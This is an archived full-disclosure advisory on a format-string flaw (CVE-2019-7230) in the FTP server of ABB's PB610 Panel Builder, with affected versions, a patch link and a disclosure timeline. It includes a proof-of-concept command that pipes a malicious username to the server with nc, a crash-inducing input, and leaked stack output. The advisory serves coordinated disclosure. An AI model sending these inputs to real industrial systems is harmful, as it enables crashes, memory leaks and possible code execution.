[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] XL-19-004 - ABB IDAL FTP Server Uncontrolled Format String Vulnerability
From: xen1thLabs <xen1thLabs () darkmatter ! ae>
Date: 2019-06-20 12:07:46
Message-ID: 74e3e51b235a47d685b854ae070e541e () darkmatter ! ae
[Download RAW message or body]
XL-19-004 - ABB IDAL FTP Server Uncontrolled Format String Vulnerability
========================================================================
Identifiers
-----------
XL-19-004
CVE-2019-7230
ABBVU-IAMF-1902008
CVSS Score
----------
8.8 (AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Affected vendor
---------------
ABB (new.abb.com)
Credit
------
Eldar Marcussen - xen1thLabs - Software Labs
Vulnerability summary
---------------------
The IDAL FTP server is vulnerable to memory corruption through insecure use of user supplied \
format strings. An attacker can abuse this functionality to bypass authentication or execute \
code on the server.
Technical details
-----------------
The IDAL FTP server does not safely handle username strings during the authentication process. \
Attempting to authenticate with the username `%s%p%x%d` will crash the server. Sending \
`%08x.AAAA.%08x.%08x` will log memory content from the stack.
Proof of concept
----------------
```
perl -e 'print "USER %08x.AAAA.%08x.%08x\r\nPASS xen1thLabs\r\n";' | nc targetip 22
````
UserManagementModule::isUserExist failed. "72657355.AAAA.616e614d.656d6567" not present in \
UserFactory UserManagementModule::LoginFTPUser failed. User :"72657355.AAAA.616e614d.656d6567" \
not present in UserFactory
Affected systems
----------------
PB610 Panel Builder 600, order code: 1SAP500900R0101, versions 1.91 ... 2.8.0.367
Solution
--------
Apply the patches and instructions from vendor:
- ABB PB610 - https://search.abb.com/library/Download.aspx?DocumentID=3ADR010377&LanguageCode=en&DocumentPartId=&Action=Launch
Disclosure timeline
-------------------
04/02/2019 - Contacted ABB requesting disclosure coordination
05/02/2019 - Provided vulnerability details
05/06/2019 - Patch available
17/06/2019 - xen1thLabs public disclosure
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic